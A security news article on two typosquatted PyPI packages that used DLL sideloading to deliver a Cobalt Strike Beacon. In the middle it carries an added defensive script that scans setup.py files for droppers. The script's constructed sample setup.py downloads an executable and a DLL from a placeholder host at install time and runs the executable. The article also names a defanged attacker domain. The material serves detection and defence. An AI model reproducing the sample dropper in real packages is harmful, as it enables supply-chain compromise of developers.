New malicious PyPI packages caught using DLL side-loading tactics

February 20, 2024 | Pressroom | Malware / Supply Chain Security

Malicious PyPI packages

Cybersecurity researchers have discovered two malicious packages in the Python Package Index (PyPI) repository that leveraged a technique called DLL sideloading to evade detection by security software and execute malicious code.

The packages, named NP6HelperHttptest and NP6HelperHttper, were downloaded 537 and 166 times respectively before they were taken down.

“The latest discovery is an example of DLL sideloading performed by an open source package that suggests the scope of threats to the software supply chain is expanding,” said ReversingLabs researcher Petar Kirhmajer in a report shared with The Hacker News.

The name NP6 is noteworthy as it refers to a legitimate marketing automation solution made by ChapsVision. Specifically, the fake packages are typosquats of NP6HelperHttp and NP6HelperConfig, which are helper tools published by one of ChapsVision’s employees on PyPI.

In other words, the goal is to trick developers looking for NP6HelperHttp and NP6HelperConfig into downloading their rogue counterparts.

Both libraries contain a setup.py script designed to download two files at install time: a legitimate executable from Beijing-based Kingsoft Corporation (“ComServer.exe”) that is vulnerable to DLL sideloading, and a malicious DLL (“dgdeskband64.dll”) that the executable loads in place of the library it expects.
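The install-time dropper pattern described above is what a package triage tool should flag before anything is installed. The following is an added example, not code from the report or from ReversingLabs: it statically parses a setup.py with Python's `ast` module and reports network fetches, process execution, references to .exe/.dll files and `cmdclass` overrides of setuptools commands. The sample setup.py is constructed for illustration; it mirrors the shape described in the article (fetch an executable and a DLL, then run the executable) but uses a placeholder domain rather than the real indicator.

```python
"""Static triage of a setup.py for install-time download-and-execute behaviour.

Heuristic only: it catches the common dropper shape (fetch a binary, run it
from an overridden setuptools command) and will miss obfuscated variants.
"""
import ast
from dataclasses import dataclass

# Call targets that fetch remote content or spawn a process during install.
NETWORK_CALLS = {
    "urllib.request.urlopen", "urllib.request.urlretrieve",
    "requests.get", "requests.post", "urlopen", "urlretrieve",
}
EXEC_CALLS = {
    "subprocess.run", "subprocess.Popen", "subprocess.call",
    "subprocess.check_output", "os.system", "os.startfile", "os.popen",
}
BINARY_SUFFIXES = (".exe", ".dll")


@dataclass
class Finding:
    kind: str      # "network", "exec", "binary" or "install_hook"
    lineno: int    # line in the setup.py where it was seen
    detail: str


def _dotted(node):
    """Rebuild 'pkg.mod.attr' from an Attribute/Name chain, or None if not a plain name."""
    parts = []
    while isinstance(node, ast.Attribute):
        parts.append(node.attr)
        node = node.value
    if isinstance(node, ast.Name):
        parts.append(node.id)
        return ".".join(reversed(parts))
    return None


def triage_setup_py(source: str) -> list:
    """Walk the AST and collect indicators of install-time download/execute."""
    findings = []
    for node in ast.walk(ast.parse(source)):
        if isinstance(node, ast.Call):
            name = _dotted(node.func)
            if name in NETWORK_CALLS:
                findings.append(Finding("network", node.lineno, name))
            elif name in EXEC_CALLS:
                findings.append(Finding("exec", node.lineno, name))
            elif name == "setup":
                # cmdclass lets the package run arbitrary code in `pip install`.
                for kw in node.keywords:
                    if kw.arg == "cmdclass":
                        findings.append(Finding("install_hook", node.lineno,
                                                "cmdclass overrides a setuptools command"))
        elif isinstance(node, ast.Constant) and isinstance(node.value, str):
            if node.value.lower().endswith(BINARY_SUFFIXES):
                findings.append(Finding("binary", node.lineno, node.value))
    return findings


def is_suspicious(findings) -> bool:
    """A network fetch combined with execution or a binary filename is the dropper shape."""
    kinds = {f.kind for f in findings}
    return "network" in kinds and ("exec" in kinds or "binary" in kinds)


# Constructed sample: placeholder domain, filenames as named in the article.
SAMPLE_SETUP_PY = '''
from setuptools import setup
from setuptools.command.install import install
import os, urllib.request, subprocess

class PostInstall(install):
    def run(self):
        install.run(self)
        base = "https://example.invalid/"  # placeholder, not a real indicator
        for name in ("ComServer.exe", "dgdeskband64.dll"):
            urllib.request.urlretrieve(base + name, os.path.join(os.getcwd(), name))
        subprocess.Popen(["ComServer.exe"])

setup(name="NP6HelperHttptest", version="0.0.1", cmdclass={"install": PostInstall})
'''

# Constructed benign sample for comparison.
BENIGN_SETUP_PY = 'from setuptools import setup\nsetup(name="np6helperhttp", version="1.0")\n'

if __name__ == "__main__":
    for label, src in (("sample", SAMPLE_SETUP_PY), ("benign", BENIGN_SETUP_PY)):
        hits = triage_setup_py(src)
        print(f"{label}: suspicious={is_suspicious(hits)}")
        for h in hits:
            print(f"  line {h.lineno}: {h.kind} {h.detail}")
```

Run it against the sdist's setup.py before installing (`pip download --no-deps --no-binary :all: <pkg>` fetches the archive without executing it). A hit on `install_hook` alone is common in legitimate packages; the combination with a network fetch and a binary filename is what warrants a closer look.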

The point of sideloading the DLL is to have the malicious code run inside a trusted, signed process so that it escapes detection, a technique previously observed in an npm package called aabquerys that used it to execute code capable of deploying a remote access trojan.

The DLL, for its part, reaches out to an attacker-controlled domain (“us.archive-ubuntu[.]top”) to retrieve a GIF file that is in reality shellcode for a Cobalt Strike Beacon, a post-exploitation toolkit used for red teaming.

There is evidence to suggest that the packages are part of a larger campaign involving the distribution of similar executable files susceptible to DLL sideloading.

“Development organizations need to be aware of threats related to supply chain security and open source package repositories,” said security researcher Karlo Zanki.

“Even if they don’t use open source package repositories, that doesn’t mean threat actors won’t abuse them to impersonate companies and their software products and tools.”
